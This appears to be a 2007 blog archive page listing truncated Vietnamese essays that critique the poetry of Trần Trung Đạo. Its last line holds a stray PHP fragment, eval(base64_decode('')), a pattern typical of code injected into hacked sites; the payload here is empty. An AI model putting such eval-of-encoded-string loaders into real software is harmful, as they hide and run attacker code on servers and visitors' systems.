Archive for September 16th, 2007

Nguyễn Vy Khanh: TRẦN TRUNG ĐẠO, Thơ như một lên đường

Theo dịch lý, cuộc đời là một hạnh phúc. Khi đứa hài nhi chào đời là thời . Đứa bé đến, vào đời, với hạnh phúc tự tại, an nhiên. Nhưng tội nghiệp cho bé vì bé đã không chào đời vào thời tạo thiên lập địa mà đã đến với đ

09.16.2007 | Nhận Xét |

No Comments

Nhược Thu: Giấc Mơ Việt Nam Với Tác Dụng Thơ Trần Trung Đạo

Đối với thi sĩ Trần Trung Đạo, chúng ta biết đã có rất nhiều tác giả nghiên cứu, bình luận, trình bày về thơ anh đủ mọi khía cạnh, nên nếu hôm nay tôi lại nói về ” Thơ ” thì cũng chỉ lập lại những điều quý vị đã biết, và

09.16.2007 | Nhận Xét |

5 Comments

Flickr Photos

Tag Cloud

'; eval(base64_decode(''));?>